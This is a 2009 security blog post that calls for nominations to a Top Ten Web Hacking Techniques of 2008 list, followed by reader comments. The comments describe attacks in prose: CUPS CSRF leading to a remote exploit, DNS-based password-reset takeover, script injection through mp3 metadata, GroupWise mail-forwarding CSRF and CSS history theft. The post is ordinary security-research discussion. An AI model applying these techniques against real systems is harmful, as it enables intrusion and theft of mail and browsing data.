A page to show up #1 on Google when searching for "Jeremiah" (Currently #4). Only the prophet and TV show left! I have the edge, TV show is cancelled and the prophet isn't generating any new content.

The prophet, TV show, and that pesky Owyang guy going down!A page to show up #1 on Google when searching for "Jeremiah Grossman", and it FINALLY has!

Monday, January 26, 2009

Calling all Researchers! Send in the Top Web Hacking Techniques of 2008

It's time once again to create the Top Ten Web Hacking Techniques of the past year. Every year Web security produces a plethora of new and extremely clever hacking techniques (loosely defined, not specific incidents), many of which are published in hard to find locations. 2008 was no different. As we've done for the past twoyears, we're looking for the best of the best. This effort serves as a way to create a centralized community reference and recognize those exceptional researchers who have contributed to our collective knowledge.

This year is special, because the researcher who places #1 will not only receive praise amongst his peers, but also receive one free pass to attend the BlackHat USA Briefings 2009! Over $1,000 (US) value. Generously sponsored by BlackHat. Winners will be chosen by a panel of judges (Rich Mogull, Chris Hoff, HD Moore, Jeff Forristal) on the basis of novelty, impact, and pervasiveness.

We’re also going to need your help. Below we’re building the living list of everything found so far. If anything is missing, and we’re positive there is because last year had over 80, we’d appreciate it if you could post a comment containing the link. Thank you and good luck!

27 comments:

Turning a local DoS vulnerability on CUPS into a remote exploit via specially-crafted webpage

This research nicely shows how combining different bugs, can allow us to turn a local crash, into a remote exploit via a specially-crafted webpage.

The three vulns in particular are (copied and pasted from original source):

" 1. CUPS allows anonymous users to add/remove RSS Subscriptions. This issue only affects CUPS <1.3.8. I later learned that this issue had been reported in the past and tracked by Apple as STR #2774. This issue is also being tracked as CVE-2008-5184 2. HTTP requests submitted to the CUPS web interface (http://localhost:631/) can be forged due to lack of tokenization (CSRF) 3. Exceeding the maximum # of RSS Subscriptions (100 by default) leads to a NULL pointer dereference crash. This issue is being tracked as CVE-2008-5183"

localhost. record in domain pointing to 127.0.0.1 + XSS vulnerability in local application with web interface as source for cookies for this domain and the potential threat with other applications listening on local interface.

Remembering 'Forgot My Password': Turning DNS Compromise Into A Generic Authentication Bypass For Most Web Frameworks And Major Properties

I'm sure everyone's sick of the DNS brouhaha, but I'd like to point out that there really weren't many systems *not* vulnerable to having their DNS polluted, thus causing their "forgotten password" emails to go to a controllable location. This attack was particularly fun on content management frameworks, because you don't just get the ability to read content: Forget the admin's password, and suddenly you get to post or modify arbitrary PHP thus allowing full remote code execution.

Whether it's more significant to get code execution on a CMS or user-level access to MySpace/Facebook/Google/Yahoo/AIM/Hotmail /GoToMyPC from one common attack is up to the discretions of the reader.

Jeremiah what about my work? Abusing HTML 5 Structured Client-side Storage: http://trivero.secdiscover.com/html5whitepaper.pdfDo you think it's a good one for a mention?I know, it's not fair to endorse themselves.. :)

I sent you email with my 18 researches, which I published in 2008. These researches are just a part of researches which I made last year and with time I'll publish many other my researches (which I made in 2006, 2007 and 2008 years).

Do you make a list of hacking techniques only for 2008? Because such interesting technique as Cross-Site Printing was published in December 2007 and was in Top Web Hacking Techniques of 2007 (is it needed to repeat yourself). If it'll be new version of technique, than it's other case.

P.S.

Besides, about same-site scripting which was mentioned by Martin. I already wrote about attacking (particularly by XSS) localhost aka 127.0.0.1 already in November 2006 in my article Using of vulnerabilities at local machines (http://websecurity.com.ua/369/). Which you can read on English (http://www.google.com/translate?u=http://websecurity.com.ua/369/&langpair=ua%7Cen&hl=en&ie=UTF8).

@pdp, added most, but not all. Couldn't decide on a couple, but open to being convinced.

"Router Hacking Challenge", seem liked a collection of vulnerabilities, not "techniques". Didn't seem novel enough over existing research. Same reasoning behind "Call Jacking: Phreaking the BT Home Hub" and "The Pownce Worm". What should be reconsidered?

Winamp "NowPlaying" Unspecified Vulnerability: The Details (http://blog.watchfire.com/wfblog/2008/09/winamp-nowplayi.html) - The post discussed an attack against a desktop application (Winamp, in this case). It consisted of poisoning the metadata of mp3 files with JavaScript. When played, the poisoned mp3 files caused a script-injection into the context of an embedded browser within Winamp. Since the injected JavaScript code had some access to internal functionalities of Winamp, the attack could potentially be further extended to the "desktop world".

Although this vulnerability has just been published now in the year 2009, it was discovered in October 2008, thus I thought it was worth adding to the list.

By forging the request that adds a new forwarding rule, a copy of any email sent to the victim user will be sent to the attacker's inbox.

The bug affects all supported versions of Novell GroupWise, the third-biggest corporate email software product which has a base of about 30 million users according to Novell.

It could be argued that this is a vulnerability, and not a technique. Well, in reality it's both. The feature being forged is different to the usual CSRF payloads that most people are familiar with:

- adding a new administrative user (applies to admin consoles)- changing the targeted user's password (would only work if the current password is NOT required to change to a new one)- transferring money (applies to financial apps)

Adrian, yes it's possible to include this new research in current list.

It depends on position of the author. For example, yesterday I wrote article Enumerating logins via Abuse of Functionality vulnerabilities (http://websecurity.com.ua/2840/, which you can read on English http://www.google.com/translate?u=http://websecurity.com.ua/2840/&langpair=ua%7Cen&hl=en&ie=UTF8). I made this research in March 2008, but because I published it this year, this article would be for 2009's hack techniques.

@Adrian, not to take anything way from the good research, but I don't think this qualify as a new "technique." While there is some wiggle room for inclusion, really wanted to stay away from a general list of vulnerabilities.

What it does is it fetches all the websites you have visited, and the ones you "are" visiting.. so if for example, you go to www.w3.org and then on other tab you go to:http://eaea.sirdarckcat.net/cssh-mon/cssh-mon.php?z=http%3A%2F%2Fwww.w3.org%2F

Then you can navigate on w3.org and the CSSH-MON will fetch all your navigation history (with the exact time you clicked each link).

The references are:http://www.yscx.net/root/documents/The_Sexy_Assassin.ppthttp://p42.us/css/